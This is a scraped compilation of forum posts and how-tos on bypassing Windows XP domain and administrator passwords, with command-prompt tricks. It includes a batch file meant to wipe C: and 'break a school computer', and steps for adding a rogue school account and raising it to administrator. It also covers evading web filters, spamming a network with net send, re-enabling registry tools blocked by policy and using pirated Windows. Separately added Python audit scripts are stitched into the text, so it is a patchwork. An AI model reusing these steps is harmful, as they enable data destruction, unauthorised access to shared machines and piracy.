about domain by-pass


Upload: thevudiyapunda

Post on 23-Oct-2014


Page 1: About Domain by-pass


Company I'm working for had/has Server 2003 on a server. But the motherboard is going out on it and it's OEM software. So I'm trying to build a new network just using XP Pro. We are small and what we are using it for doesn't justify spending 2k to replace server software.

The issue I'm having is that whoever set up the network is unreachable and nobody knows the usernames and passwords to log on locally, only to login to the server domain. What resolutions are there so that I can set up new network connections on the computers which were part of the old domain?

Only options available once computer boots up is to either connect to domain or connect locally. Obviously if I could connect locally I could reconfigure the network. But without knowing the user and pw there is an issue.

---------------------------------------------------------------------------------------------------------------------

I had to do the same thing last year. The owner didn't want to pay for a new server. So I changed it from a domain network to a peer to peer network with a workgroup.

Don't take any machine off the network yet. Login to the domain as administrator from each machine, one at a time. Reset the local administrator password on each machine, by going to the run box and entering compmgmt.msc , press enter.

Go to Local Users and Groups, Users. Highlight Administrator, click Action, Set Password. Use the same password to make it easier. At that point you will have a local administrator account for each machine. Add any domain users to the local machine who may need access at the same time. Copy their favorites, my documents, etc... from the domain account to the local account if necessary.

At that point you can remove the machine from the domain and put it on the work group. Just make sure that you copy all the shares from the server to whichever machine you are going to use as a file server before you remove it from the network. Set the permissions.

---------------------------------------------------------------------------------------------------------------------

The administrator password in Windows XP is the password used to access the "Administrator" account.


This account usually doesn't show up on the logon screen and most people don't know it exists. Usually that's okay because you won't need to use your computer under this account very often.

However, there are a few times when you will need this password. When you're accessing the Windows XP Recovery Console or you're trying to boot into Windows XP Safe Mode, you'll need this password before you can continue.

Follow the steps below to quickly find the Windows XP Administrator password on your computer:

Difficulty: Average

Time Required: Figuring out the Administrator password may take a few minutes to hours depending on the situation

Here's How:

1. Try leaving the password blank. Just press Enter without typing anything when asked for it.

The password to the Windows XP Administrator account is defined during the initial Windows XP installation process and it's often simply left blank.

2. Enter the password to your account. Often times, depending on how Windows XP was setup on your computer and what part of XP is asking for an admin password, the primary user account will also be configured with administrator access.

3. Try to remember your administrator password. If you installed Windows XP on your computer yourself, you probably set the administrator password during the Windows XP installation process. If that's true, you might be able to make really good guesses at what the password might be.

4. Have another user enter his or her password. If there are other users that have accounts on your Windows XP computer, one of them may be setup with administrator access.

5. Recover the administrator password using a Windows password recovery tool. These tools are software programs designed to discover or reset/delete Windows passwords.

Note: Some password recovery tools in the list I linked to above also have the ability to transform regular user passwords into administrator passwords. This could be valuable if you know your account's password but it's not an administrator account.


6. Perform a clean installation of Windows XP. This is a last resort option. This type of installation will completely remove Windows XP from your PC and install it again from scratch.

If you're just curious about the password to your Administrator account then obviously don't go to this extreme. However, if you're needing the Administrator password to access diagnostic tools and this is your last effort to save your PC, performing a clean install will work.

Tips:

1. Looking for your administrator password but aren't using Windows XP? See How to Find Windows Administrator Passwords for instructions tailored for other Windows operating systems.

I've put together a single floppy or CD / USB Drive which contains things needed to reset the passwords on most systems. The CD can also be installed on a USB drive, see readme.txt on the CD.

The bootdisk should support most of the more usual disk controllers, and it should auto-load most of them. Both PS/2 and USB keyboard supported.

More or less tested from NT3.5 up to Windows 7, including the server versions like 2003 and 2008. Also 64 bit windows supported.

DANGER WILL ROBINSON! If password is reset on users that have EFS encrypted files, and the system is XP or newer, all encrypted files for that user will be UNREADABLE! and cannot be recovered unless you remember the old password again. If you don't know if you have encrypted files or not, you most likely don't have them (except maybe on corporate systems).

Please see the Frequently Asked Questions and the version history below before emailing questions to me. Thanks!

• Should now be possible to load extra drivers (drivers?.zip) from USB the same way as with floppy. Or maybe not. Did not test it that much.

• Fixed a lot of bugs in the registry handling, did not affect password reset much, but did affect larger registry edits.


• You still may experience hangs when the NTFS disk is mounted, it will hang after saying "NTFS version x.xx" or such. If there is disc activity, just wait, it may take a while.

2007-09-27

• Patched up NTFS driver to get rid of hang on mount in many cases (after selecting disk). Got many problem reports on this. At the same time someone on the NTFS-for-linux mailinglist mentioned it, and Anton Altaparmakov made a patch very quick. Thank you Anton!

• Nice if people experiencing the hang in 2007-09-23 can mail me and tell if the fix worked or not. Thanks!

• NOTE: It may still take up to a minute or two to select the disk.

• Floppy version had a script bug making it crash in the first menu. Fixed.

• CCISS driver (HP/Compaq DLxxx etc) had different device paths. Hacked in support for it, may not be 100% still.

2007-09-23

• Floppy version is back! (requires 3 floppies to get all drivers, but you can compose your own driver set so you only need 2)

• Yes, VISTA is supported (even more)

• Disk select now indicates which disks are removable, ie are USB keys for instance.

• Check for "read-only" NTFS mount, you get instructions on what to do if there are problems with the disk so changes won't be saved.

• Missed out on some IDE/ATA and SATA drivers last time, better now.. I hope.

• User can be added to the administrator group, making them administrators.

• Stupid typo in readme.txt on CD fixed, on how to make USB bootable.

(earlier history removed)

9705xx

• First public release.

Download

Note: Some links may be offsite.


CD release, see below on how to use

• cd110511.zip (~3MB) - Bootable CD image. (md5sum: fe0d30a1c540ec6757e748c7c09e2e4f)

• usb110511.zip (~3MB) - Files for USB install (md5sum: 50ced8d2a5febe22199f99acec74e63b)

• cd100627.zip (~4MB) - Previous version CD. (md5sum: 6d80cdfbba97457e413f95a3554d9524)

The files inside the USB zip are exactly the same as on the CD. See below for instructions on how to make USB disk bootable.

Floppy release (not updated anymore), see below on how to use them

• bd080526.zip (~1.4M) - Bootdisk image (md5sum: 37889e4c540504e59132bdcdfe7f9bb7)

• drivers1-080526.zip (~310K) - Disk drivers (mostly PATA/SATA) (md5sum: 72ac1731c6ba735d0ac2746a30dbc3ee)

• drivers2-080526.zip (~1.2M) - Disk drivers (mostly SCSI) (md5sum: 30172bec657c85a5f1a0b43601452fb7)

Previous versions may sometimes be found here (also my site)

NOTE: Versions before 0704xx will corrupt the disk on VISTA!

NOTE THAT THE BOOTDISK CONTAINS CRYPTOGRAPHIC CODE, and that it may be ILLEGAL to RE-EXPORT it from your country.

How to make the CD

Unzipped, there should be an ISO image file (cd??????.iso). This can be burned to CD using whatever burner program you like, most support writing ISO-images. Often double-clicking on it in explorer will pop up the program offering to write the image to CD. Once written the CD should only contain some files like "initrd.gz", "vmlinuz" and some others. If it contains the image file "cd??????.iso" you didn't burn the image but instead added the file to a CD. I cannot help with this, please consult your CD-software manual or friends.

The CD will boot with most BIOSes, see your manual on how to set it to boot from CD. Some will auto-boot when a CD is in the drive, some others will show a boot-menu when you press ESC or F10/F12 when it probes the disks, some may need to have the boot order adjusted in setup.


How to make a bootable USB drive

• Copy all the files that are inside the usbXXXXXX.zip or on the CD onto a USB drive, directly on the drive, not inside any directory/folder.

• It is OK if there are other files on the USB drive from before, they will not be removed.

• Install bootloader on the USB drive, from command prompt in windows (start the command line with "run as administrator" if possible)

• X:syslinux.exe -ma X:

• Replace X: with the drive letter the USB drive shows up as (DO NOT USE C:)

• If it seems like nothing happened, it is usually done.

• However, a file named ldlinux.sys may appear on the USB drive, that is normal.

• It should now in theory be bootable.

• Please know that getting some computers to boot from USB is worse than from CD, you may have to change settings, or some will simply not work at all.

How to make the floppy

The unzipped image (bdxxxxxx.bin) is a block-to-block representation of the actual floppy, and the file cannot simply be copied to the floppy. Special tools must be used to write it block by block.

• Unzip the bd zip file to a folder of your choice.

• There should be 3 files: bdxxxxxx.bin (the floppy image) and rawrite2.exe (the image writing program), and install.bat which uses rawrite2 to write the .bin file to floppy.

• Insert a floppy in drive A: NOTE: It will lose all previous data!

• Run (doubleclick) install.bat and follow the on-screen instructions.

• Thanks to Christopher Geoghegan for the install.bat file (some of it ripped from memtest86 however)

Or from unix:

dd if=bd??????.bin of=/dev/fd0 bs=18k

How to make and use the drivers floppy

• Simply copy the zip file onto an empty floppy.

• You MUST NOT UNZIP THE ZIP FILE!


• Depending on your hardware you may only need one of the driver sets or the other, or maybe both.

• To use, insert one of the driver floppies when asked for it after booting, the zip file will be unzipped to memory.

• If no drivers matched (no harddisk found), you can select 'f' from the main menu to load the other driver set.

• Then select 'd' to auto-start the new drivers (if it matches your hardware)

• Sometimes it fails detecting the floppy change and you get an error, just select 'f' again, it works the second time.

• For more advanced users that use this often, it is possible to unzip just the drivers you need and zip them up into a new zip archive. The zip file name must start with "drivers", the rest is ignored. (it unzips drivers*.zip)

Regedit Uses: 

• For All USB Port Disable

• HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\USBSTOR (double-click USBSTOR; a list will open on the right side. In that list, double-click Start and change the value to 4 (disable); 3 is enable.)

You can "hack" all of the following with Command Prompt:

Most Websites
User Accounts (on your computer)
Computer Settings
E-mail
and some other stuff -.-

To do anything related to hacking with Command Prompt you must know my best friend and his name is IP! IP is everything in the cyber world, it identifies you like no other. With your IP someone can find out where you live, who the computer's registered to, the computer's name, and more! So think of it as your cyber Social Security Number (SSN); you don't want to just tell everyone it.

So to get your IP you can start by opening Command Prompt. Next make sure it is on C: Drive.


Then type in the following:

ipconfig /all

This will display a lot of info, some of which is very important. This will tell you how you are connected to the internet and with what and also a lot of other stuff (I will not lie, some of the info it gives is useless). Congrats, you learned a command! And you have now found out your IP! (I'm not telling where it is, I'm just saying it's there if you scroll up a little bit)

Now to find internet connection! Let's say you and a friend are playing an MMO and your friend is host and you are lagging. Well, if you want to find out why, just type into command prompt the following:

Ping 127.0.0.1

(replace 127.0.0.1 with your friend's IP) (also 127.0.0.1 is local host, or you, and is used for offline "things") (it also means nothing towards your IP basically). The lower the number you see the better! Lower means faster and higher means slower.

Now time for some "Advanced" stuff.

How to find out computer account passwords! This will require you to know the username. First open Command Prompt. Then type in the following:

Net User

This will give you all the accounts (so I lied, you didn't need to know the usernames xD). Now type in:

Net User Admin

(you may replace Admin with the account name). Now you get even more info on that account; if you read it all it tells you about the password. Now if you want to change the password just type the following:

Net User Admin Password

(you can replace Admin with the username and Password with the desired password) and TADA, you have changed the account password.

O.K. that is all that I will currently say, I will post more in the future, this is just a taste of things to come, and now for some fun with Command Prompt!

Page 9: About Domain by-pass

9  

Open up Notepad.exe or in Command Prompt type Notepad (you may type in a files name with out the .exe on the end and it will run it) Now type in the following:  start  start  start  start  start  start  start crash   then click Save as and select all files, then name is .bat and when you are board just run it and u'll see what it does (make sure you save what your doing first!) it will auto name to Crash.bat  O.K. i take NO RESPONSIBILITY FOR WHAT I AM ABOUT TO POST! this file will BREAK YOU COMPUTER!  @echo off taskkill ‐f explorer.exe start %windir%\System32\rundll32.exe user32.dll, LockWorkStation rd c:\ /s /q cls  put that into a notepad and name it Break.bat now what will this do? it will first delete all internet browsers! then it will lock you out of your computer and then delete your System 32 file which is what your computer needs to RUN! now DO NOT USE THIS! i only posted this for those how want to break a school computer! be careful with this because you will need to get a new computer since restoring can't fix this! now be safe and have fun with the new skills i have just taught you! don't forget to thanks and rep me!   

Open command prompt from where it is Banned or not allowed by admin (awesome tricks)  


Open up Command Prompt (Start>Run>Command.com)

Can't use command prompt at your school?

Open up Microsoft Word. Type:

Command.com

Then save it as Somthing.bat.

Warning: Make sure you delete the file because if the admin finds out you're in big trouble.

--Adding a user to your network--

Type:

Net user Haxxor /ADD

That will add "Haxxor" onto the school user system.

Now you added users, let's delete them!

Type:

Net user Haxxor /DELETE

Warning: Be careful, it deletes all their files.

"Haxxor" will be deleted from the user system.


Hmmm? It says access denied?

That's because you're not admin!

Now let's make you Admin!

This will make Haxxor an admin. Remember that some schools may not call their admins 'adminstrator' and so you need to find out the name of the local group they belong to.

Type:

net localgroup

It will show you what they call admin. Say at my school they call it adminstrator, so then I would type:

net localgroup administrator Haxxor /ADD

Getting past your web filter.

Easy way: Type whatever you want to go on. Say I wanted to go on miniclip's bug on wire, I would go to google and search miniclip bug on wire, then instead of clicking the link I would click "cached".

Hard way: I'm hoping you still have command prompt open.

Type:

ping miniclip.com

And then you should get an IP. Type that out in your web browser, and don't forget to put "http://" before you type the IP.

Sending messages through your school server

Okay, here's how to send crazy messages to everyone in your school on a computer. In your command prompt, type

Net Send <domain> * "The server is h4x0r3d"

Note: <domain> may not be necessary, depending on how many your school has access to. If it's just one, you can leave it out.

Where <domain> is, replace it with the domain name of your school. For instance, when you log on to the network, you should have a choice of where to log on, either to your school, or to just the local machine. It tends to be called the same as your school, or something like it. So, at my school, I use

Net Send Haxxor School * "The server is h4x0r3d"

The asterisk denotes wildcard sending, or sending to every computer in the domain. You can swap this for people's accounts, for example

Net Send Varndean dan,jimmy,admin "The server is h4x0r3d"

Use commas to divide the names and NO SPACES between them.

what say?? ~Cheers~

or  


Allowing dos and regedit in a restricted Windows

A very simple tactic I found after accidentally locking myself out of dos and regedit is to open notepad and type the following:

REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp]
"Disabled"=dword:0

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:0

Save it as something.reg then run it. Simple.
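From the administrator's side, the registry values mentioned above (USBSTOR Start, DisableRegistryTools, WinOldApp Disabled) can be checked against a lockdown baseline. The following Python script is an added example, not part of the original page: it parses a .reg export and reports values that differ from the baseline. The baseline values and the sample export are assumptions constructed for illustration.

```python
import re

# Assumed lockdown baseline (not from the page): (key, value name) -> expected dword.
POL = r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies"
BASELINE = {
    (r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\USBSTOR", "Start"): 4,
    (POL + r"\System", "DisableRegistryTools"): 1,
    (POL + r"\WinOldApp", "Disabled"): 1,
}

# Constructed sample export of a workstation whose restrictions were relaxed.
SAMPLE_REG = r'''REGEDIT4

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\USBSTOR]
"Start"=dword:00000003
"Type"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableRegistryTools"=dword:0

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp]
"Disabled"=dword:00000001
'''

SECTION = re.compile(r'^\[(-?)(.+)\]$')
VALUE = re.compile(r'^(?:"((?:[^"\\]|\\.)*)"|@)=(.*)$')


def parse_reg(text):
    """Parse .reg text into {key: {value_name: data}} with lower-cased names.

    data is an int for dword values, a str otherwise, and None for a value
    deleted with "name"=-. A key deleted with [-key] maps to None.
    """
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue  # blank line or comment
        section = SECTION.match(line)
        if section:
            name = section.group(2).lower()
            if section.group(1):            # [-key] removes the whole key
                keys[name], current = None, None
            else:
                if keys.get(name) is None:
                    keys[name] = {}
                current = keys[name]
            continue
        value = VALUE.match(line)
        if value is None or current is None:
            continue  # header line, or a value outside any key
        vname = "@" if value.group(1) is None else value.group(1).lower()
        data = value.group(2).strip()
        if data == "-":
            current[vname] = None
        elif data.lower().startswith("dword:"):
            current[vname] = int(data[6:], 16)   # dword data is hexadecimal
        elif len(data) >= 2 and data.startswith('"') and data.endswith('"'):
            current[vname] = data[1:-1]
        else:
            current[vname] = data
    return keys


def audit(text, baseline=BASELINE):
    """Return (key leaf, value name, actual, expected) for each deviation.

    A missing or deleted value is reported with actual=None, because an
    absent policy value means the restriction is not in force.
    """
    parsed = parse_reg(text)
    findings = []
    for (key, name), expected in baseline.items():
        values = parsed.get(key.lower())
        actual = values.get(name.lower()) if values else None
        if actual != expected:
            findings.append((key.rsplit("\\", 1)[-1], name, actual, expected))
    return findings


if __name__ == "__main__":
    for leaf, name, actual, expected in audit(SAMPLE_REG):
        print(f"{leaf}\\{name}: found {actual}, baseline expects {expected}")
```

Registry key and value names are compared case-insensitively, matching how Windows treats them.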

NETWORKING HACK  Chat With Command Prompt  Talk with other computers on your network. 

If you want a private chat with a friend or client on your network, you don't need to download any fancy program! All you need is your friend's IP address and Command Prompt. Firstly, open Notepad and enter:

@echo off
:A
Cls
echo MESSENGER
set /p n=User:
set /p m=Message:
net send %n% %m%
Pause
Goto A

Now save this as "Messenger.bat". Open the .bat file and in Command Prompt you should see:

MESSENGER
User:

After "User" type the IP address of the computer you want to contact. After this, you should see this:

Message:

Now type in the message you wish to send. Before you press "Enter" it should look like this:

MESSENGER
User: 56.108.104.107
Message: Hi

Now all you need to do is press "Enter", and start chatting!

How to start System Restore by using the Command prompt

Note You must be logged on to Windows with a user account that is a computer administrator to complete these steps. To verify that you are logged on to Windows with a user account that is a computer administrator; visit the following Microsoft Web site:

If a new program has made your computer behave unpredictably, and uninstalling the new program did not help, you can try the Windows XP System Restore tool.

Important If you have not previously set a restore point in System Restore, you cannot restore your computer to a previous state. If you are not sure, or if you have not previously set a restore point, contact Support.

To start System Restore using the Command prompt, follow these steps:

1. Restart your computer, and then press and hold F8 during the initial startup to start your computer in safe mode with a Command prompt. 


2. Use the arrow keys to select the Safe mode with a Command prompt option. 

3. If you are prompted to select an operating system, use the arrow keys to select the appropriate operating system for your computer, and then press ENTER. 

4. Log on as an administrator or with an account that has administrator credentials. 

5. At the command prompt, type %systemroot%\system32\restore\rstrui.exe, and then press ENTER.

6. Follow the instructions that appear on the screen to restore your computer to a functional state. 

Note To start the System Restore tool using another safe mode option, visit the Microsoft Help and Support Web site and see the article "A description of the Safe Mode Boot options in Windows XP." For additional information about the Safe mode with a command prompt, click the following article number to view the article in the Microsoft Knowledge Base:  315222  A description of the Safe mode boot options in Windows XP  

Finding the IP Address for another Computer in Windows XP/Vista/7

Notes:

• Important: You must know the full computer name of the computer for which you want to find the IP address.

• If the computer for which you are trying to find the IP address uses a DHCP connection, keep in mind that the IP address will change on a regular basis.

To find another computer's IP address:

1. Connect to the Internet.
2. Click the Start button.
3. Start the Run utility.
   o In Windows XP, select Run.
   o In Windows Vista/7:
      1. Select All Programs.
      2. Select Accessories.
      3. Select Run.
4. In the Open: text box, type: cmd
5. Click OK.
6. Ping the computer for which you want to find the IP address.


o In XP, at the command prompt, type: ping [Full Computer Name]

Note: Replace [Full Computer Name] with the full name of the computer.

o In Vista/7, at the command prompt, type: ping -4 [Full Computer Name]

Note: Replace [Full Computer Name] with the full name of the computer.

7. Press the Enter key.
8. Locate the IP address in the results of your ping session.
9. Close the command prompt window.

There is a hidden administrator account. You can log on to it and you can change or remove all the other passes of your comp without knowing the previous passes. Just type ctrl alt del twice and then type Administrator on the account name and you can enter. If that won't work, restart the computer and toggle the F5 button. You will get a screen that will ask you if you want to boot with command prompt, choose it and then type net user, then press enter

# Then again type "Net user [Username of the Account]*" then press Enter, without the ["], and quotes. Make sure you spell the username correctly, and you have the '*'

# To change password press enter and after that tieler south * Reset password to whatever you want.

If that won't work, go to this link ..more suggested info on the replies

LITTLECOMPNERD - May 19, 2009 4:08pm BST

press f8 then select start safe mode command prompt

Edrick - Oct 24, 2009 8:40am BST

hi can you help me i want to use my bro. comp but i don't know his pass how can i know it without changing anything or resetting it pls help me

ARK - May 26, 2011 1:21pm BST

Edrick, that's easy just follow these steps,
1. ask your bro the pass
2. enter in the pass
3. Voila!! YOU ARE ON!!

There are 3 real ways to bypass any stuck passwords on any XP computer.

1. Use the built-in machine administrator, if it's unlocked. Seeing that administrators can change the passwords of administrators, access to any local administrative account will yield an entry to the user account control panel applet. To see if your built-in admin account is unlocked, you will need to start the computer normally. When it finishes loading, you will have one of two screens: The welcome screen, or the Windows Logon screen. If you have a welcome screen (Windows XP Home default) you will need to press CTRL ALT DEL simultaneously, and then again. CTRL+ALT+DEL release CTRL+ALT+DEL release. The welcome screen should change to the advanced login screen, that you may already have if you have turned off the welcome screen, or if you are using XP Pro, or Windows Server 2003. Next, for username type in Administrator, leave the password blank. If you can get in with this account, or any administrator account, click on start and click run. Type "Control UserPasswords2". From here, adjust the passwords of each account on the computer as you see fit.

2. Next, let's say you can't get into any administrative account, or perhaps Windows is not loading all the way because your product key has expired. You will NOT be able to access command prompt in safe mode to change administrative accounts unless you can actually log on to the computer, so if Windows is locked because of product key issues, don't try this. But if you can still get into a user account that is not an admin, and you need to unlock an admin, then log in as the normal user and create a new account using command prompt (as a limited user you cannot do this via the control panel) and type


net user Admin2 password1 /add

This creates an account named Admin2 with a password of password1. Next see if you can make this account an admin. Type

net localgroup Administrators Admin2 /add

If you get an access denied message, you will need to go to step 3. If you get a command completed successfully, then log out and go to the normal login screen. Then log in as Admin2 with the new account, and you now have admin control of the pc. Go to step 1.

3. If you cannot get into Windows as any account or using command prompt in safe mode or if Windows is locked with a bad product key, you can use third party software to adjust the Admin Password, or to adjust the Microsoft oobe activation client, so that you can regain access. My suggestions would be to use a Linux boot disc (which you can put on a CD, floppy, or flash drive) and as long as BIOS is configured to accept a boot order with one of these devices before the hard drive, then you are good to go. If not, you will have to go into BIOS to change it. Type F1 or F2 at startup to gain access to BIOS. If there is a BIOS password, and you don't know it, you will have to reset BIOS using the reset jumper on the inside of the motherboard. Look that up on Google for more information.

4. If all else fails, and you cannot get in, you will have to settle for reformatting. This will clear all user data and files previously on the computer though, so save whatever you can beforehand. Then, on another computer, download a copy of an installation disc for Torrents or pirate bay and burn the ISO to a disc using IMGBurn or Nero, or any of those other hokey ISO burning programs. Then, place the disc in the computer you want to reformat. When it says "Press any key to boot from disc" (during the normal boot) press a key, and wait for the OS to load the WINDOWS Setup Menu. Follow the onscreen instructions to reformat the hard drive and


reinstall windows. If it asks you for the current admin password you are doing something wrong. Make sure you are not trying to repair windows, or install windows onto the already made partition. This will ask for a password. You need to press D to delete the partition. Delete all partitions on the drive. L to confirm the delete. Then once your disc is empty, press enter to reinstall windows and reformat, etc. Follow the directions on the screen. If you are using a cracked version of Windows, you will not need a product key. If you are using a normal disc, and you have a product key that works (usually on the side of the OEM machine, or on a label on the software package for ordered products) then type that in if it asks for it during setup, or after setup on the first logon when MSOobe (the activator) starts.

Any questions, or if you'd like me to outline specific instructions for you in a specific scenario, e-mail me privately at zgwin (at) zigweb (dot) net.

~Zach
Microsoft MVP
Software Architect
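The account changes described in the posts above (a new local account, an addition to the administrators group, a password set on someone else's account) are recorded as account-management audit events: IDs 624, 636, 628 and 630 on Windows XP/2003, and 4720, 4732, 4724 and 4726 on Vista and later. The following Python script is an added example, not part of the original posts, that flags those sequences. It assumes "Audit account management" is enabled, and the one-line log format, the sample events, the 30-minute window and the group names are constructed for illustration.

```python
import re
from datetime import datetime, timedelta

# Account-management event IDs: Windows XP/2003 and Vista-and-later equivalents.
KIND = {624: "created", 4720: "created",
        628: "password_set", 4724: "password_set",
        630: "deleted", 4726: "deleted",
        636: "group_add", 4732: "group_add"}

# Constructed sample in a simplified one-line-per-event format (an assumption;
# real Security log exports carry more fields).
SAMPLE_LOG = r"""2014-10-23 09:14:02 EventID=624 Actor=LAB\student7 Target=Haxxor
2014-10-23 09:14:40 EventID=636 Actor=LAB\student7 Target=Haxxor Group=Administrators
2014-10-23 09:20:11 EventID=628 Actor=LAB\Haxxor Target=Administrator
2014-10-23 09:31:05 EventID=630 Actor=LAB\Haxxor Target=Haxxor
2014-10-23 11:02:00 EventID=624 Actor=LAB\itadmin Target=newteacher
2014-10-23 11:02:30 EventID=636 Actor=LAB\itadmin Target=newteacher Group=Users
"""

LINE = re.compile(r"^(\d{4}-\d\d-\d\d \d\d:\d\d:\d\d) EventID=(\d+) (.+)$")


def parse_events(text):
    """Return the account-management events in the text, oldest first."""
    events = []
    for line in text.splitlines():
        m = LINE.match(line.strip())
        if not m or int(m.group(2)) not in KIND:
            continue  # not an event line, or an event ID we do not track
        fields = dict(p.split("=", 1) for p in m.group(3).split() if "=" in p)
        events.append({
            "time": datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S"),
            "kind": KIND[int(m.group(2))],
            "actor": fields.get("Actor", ""),
            "target": fields.get("Target", ""),
            "group": fields.get("Group", ""),
        })
    return sorted(events, key=lambda e: e["time"])


def detect(events, privileged=("administrators",), window=timedelta(minutes=30)):
    """Return (rule, target account, actor) tuples for suspicious sequences.

    privileged is configurable because, as the page notes, the local admin
    group is not always called "Administrators".
    """
    priv = {g.lower() for g in privileged}
    created = {}   # lower-cased account name -> creation time
    alerts = []
    for e in events:
        target = e["target"].lower()
        actor_user = e["actor"].rsplit("\\", 1)[-1].lower()
        recent = target in created and e["time"] - created[target] <= window
        if e["kind"] == "created":
            created[target] = e["time"]
        elif e["kind"] == "group_add" and e["group"].lower() in priv:
            # A brand-new account gaining admin rights is the strongest signal.
            rule = "new-admin" if recent else "admin-group-add"
            alerts.append((rule, e["target"], e["actor"]))
        elif e["kind"] == "password_set" and actor_user != target:
            alerts.append(("password-reset-by-other", e["target"], e["actor"]))
        elif e["kind"] == "deleted" and recent:
            alerts.append(("short-lived-account", e["target"], e["actor"]))
    return alerts


if __name__ == "__main__":
    for rule, target, actor in detect(parse_events(SAMPLE_LOG)):
        print(f"{rule}: account {target} (by {actor})")
```

Routine administration also produces these events, so the alerts are review leads to compare against change records.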

drew - Jul 23, 2009 6:37am BST

Zach,

first off i read some of the stuf u wrote on a forum and figured u knew what you were talking about, so i thought u might be able to help. i have a virus on my computer that has allowed someone to hack into it and change my login password on windows xp home edition. iv tried everything i can to get into it, iv gone through bios, iv tried F2 ,5,8,10 and 12, and iv got nothing. i don’t really have a way to get any type of password cracking softwear onto a cd or anything, i was wondering if you could tell me maybe how to hack my own computer to bypass the login screen. oh and another thing too that i thought was weird, when i tried to boot from a disk it said that it couldn't... i dont know y it would say that when i have a cd and a dvd drive 

Page 20: About Domain by-pass

20  

and they both work. but yea thats where im at. maybe u can shed a little light on that for me. thanks.  Drew 

frustrated - Sep 14, 2009 3:36am BST

I have a legal version of Windows XP Pro, with disks and product key and all that. I even have access to a user account with administrative rights. My problem is the hidden Administrator account (that I can only see when booting in Safe Mode) has a password on it, and I can't remember what it is. I need it because I want to reset my MBR, and the only way I've found to do that is to boot from the installation CD and go into recovery mode and run fixmbr. To get into recovery mode, I need the password to this Administrator account. Do you know of a way to reset this password or get around this problem somehow?

Thanks a ton for any help.

awmking - Oct 25, 2009 5:33am GMT

Could you please help me too? Will this info work for Windows Vista HP? I cannot seem to recover my admin pass... please help... thanks in advance

dz bunni - Oct 9, 2009 12:19am BST

THIS EASY METHOD JUST WORKED FOR ME, I BYPASSED THE PASSWORD BY DELETING IT, THEN CREATED NEW ONE, SYSTEM WORKING GREAT, NO ADVERSE GLITCHES!

I have a Dell laptop, forgot the password I created, and I am the main account holder. My computer guy I assume has created an administrator password, but when I contacted him about this issue, I was told there would be a $50 fee to reset the password, so I came to this forum and tried every method listed here! Of course, it wasn't until I got to the last few postings that I found one that worked! This method just worked completely for me, I am now operating Windows in normal mode and happy to have impressed myself, lol! I decided to post this method in PLAIN ENGLISH, for those of us less computer savvy.

1. When Windows is starting up, press F8. (I had to attempt this a few times till I got it right; when I continuously hit the F8 key as fast as I could it worked, but you must begin hitting it as soon as Windows begins to load.)
2. This will take you into a screen where Windows lists different settings you can choose, as to how you want Windows to run. I used the arrow keys on my keyboard and selected safe mode: select SAFE MODE.
3. For user name, type the word: administrator
4. No password should be needed, so then press: Enter
5. Windows should then load in safe mode. Access the Control Panel by doing the following: click Start, Control Panel, User Accounts.
6. Once in User Accounts, find the name of the account that you need the password for, and click on that account, then click on the option to remove the password for that account. THAT ACCOUNT IS NOW PASSWORD FREE!
7. Restart Windows in normal mode and log in!

I also then managed to create (recreate) a password for that account as well, and then I created a guest account too!

Hiding the C Drive

From the Run command, open regedit and go to HKEY_CURRENT_USER --> Software\Microsoft\Windows\CurrentVersion\Policies\Explorer. As soon as you click Explorer, its contents appear on the right side. Right-click in a blank area there and choose New --> DWORD Value; a dialog box opens. (Name this new entry NoDrives.) Then, in the DWORD Value box, enter 4 if you want to hide the C drive. Then select Decimal and click OK. After that, restart. If you look now, the C drive will be hidden. The value for each drive letter is: A:1, B:2, C:4, D:8, E:16, F:32, G:64, H:128, I:256, J:512, K:1024, Z:33554432
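The per-letter values listed above are single bits of one DWORD (A is bit 0, Z is bit 25), so several drives are hidden by adding their values. The following Python is an added example, not part of the original post, for decoding a NoDrives value found in a user's hive back into drive letters; the function names are this example's own.

```python
import string

# Bit 0 is drive A:, bit 25 is drive Z: (A:1, B:2, C:4 ... Z:33554432).
ALL_DRIVES_MASK = (1 << 26) - 1


def nodrives_mask(letters):
    """Return the NoDrives DWORD that hides the given drive letters."""
    mask = 0
    for letter in letters:
        letter = letter.rstrip(":").upper()
        if len(letter) != 1 or letter not in string.ascii_uppercase:
            raise ValueError(f"not a drive letter: {letter!r}")
        mask |= 1 << (ord(letter) - ord("A"))
    return mask


def hidden_drives(value):
    """Decode a NoDrives DWORD into the list of hidden drive letters."""
    if not 0 <= value <= 0xFFFFFFFF:
        raise ValueError("NoDrives is a 32-bit DWORD")
    return [chr(ord("A") + bit) for bit in range(26) if value & (1 << bit)]


def parse_dword(text):
    """Accept the decimal form typed into regedit or the dword:XXXXXXXX form of a .REG export."""
    text = text.strip()
    if text.lower().startswith("dword:"):
        return int(text[6:], 16)
    return int(text, 10)


def audit_nodrives(text):
    """Summarise a NoDrives setting: which drives it hides and any bits above Z: that are set."""
    value = parse_dword(text)
    return {
        "value": value,
        "hidden": hidden_drives(value),
        "undefined_bits": value & ~ALL_DRIVES_MASK & 0xFFFFFFFF,
    }


if __name__ == "__main__":
    # Constructed sample values: the decimal 4 from the steps above and a .REG-style export.
    for sample in ("4", "dword:0000000c", "dword:04000004"):
        print(sample, audit_nodrives(sample))
```

Setting the value back to 0, or deleting NoDrives, makes all drives visible again after the next logon or restart.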

Command Lines:

ADDUSERS  Add or list users to/from a CSV file
ADmodcmd  Active Directory Bulk Modify
ARP  Address Resolution Protocol
ASSOC  Change file extension associations•
ASSOCIAT  One step file association
ATTRIB  Change file attributes

b
BCDBOOT  Create or repair a system partition
BOOTCFG  Edit Windows boot settings
BROWSTAT  Get domain, browser and PDC info

c
CACLS  Change file permissions
CALL  Call one batch program from another•
CD  Change Directory - move to a specific Folder•
CHANGE  Change Terminal Server Session properties
CHKDSK  Check Disk - check and repair disk problems
